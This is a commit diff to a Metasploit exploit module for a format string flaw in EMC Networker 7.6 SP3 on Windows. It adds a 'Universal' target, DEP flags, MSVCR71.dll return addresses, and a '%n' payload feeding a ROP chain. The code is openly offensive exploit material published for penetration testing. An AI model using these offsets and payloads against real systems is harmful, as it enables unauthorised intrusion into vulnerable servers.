Skip to content

Commit 88c9916

Browse files
author
jvazquez-r7
committed
added universal target
1 parent b8eea10 commit 88c9916

File tree

1 file changed

+13
-4
lines changed

1 file changed

+13
-4
lines changed

modules/exploits/windows/emc/networker_format_string.rb

Lines changed: 13 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -45,20 +45,29 @@ def initialize(info = {})
4545
},
4646
'Targets' =>
4747
[
48+
['EMC Networker 7.6 SP3 / Windows Universal',
49+
{
50+
'Ret' => 0x7c354dac, # ret from MSVCR71.dll
51+
'Offset' => 156,
52+
'DEP' => true
53+
}
54+
],
4855
['EMC Networker 7.6 SP3 / Windows XP SP3',
4956
{
5057
'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll
51-
'Offset' => 156
58+
'Offset' => 156,
59+
'DEP' => false
5260
}
5361
],
5462
['EMC Networker 7.6 SP3 / Windows 2003 SP2',
5563
{
5664
'Ret' => 0x7c354dac, # ret from MSVCR71.dll
57-
'Offset' => 156
65+
'Offset' => 156,
66+
'DEP' => true
5867
}
5968
]
6069
],
61-
'DefaultTarget' => 1,
70+
'DefaultTarget' => 0,
6271
'Privileged' => true,
6372
'DisclosureDate' => 'Aug 29 2012'))
6473

@@ -73,7 +82,7 @@ def exploit
7382

7483
fs = "%n" * target['Offset']
7584
fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll
76-
if target.name =~ /Windows 2003/
85+
if target['DEP']
7786
rop_gadgets =
7887
[
7988
# rop chain generated with mona.py

0 commit comments

Comments
 (0)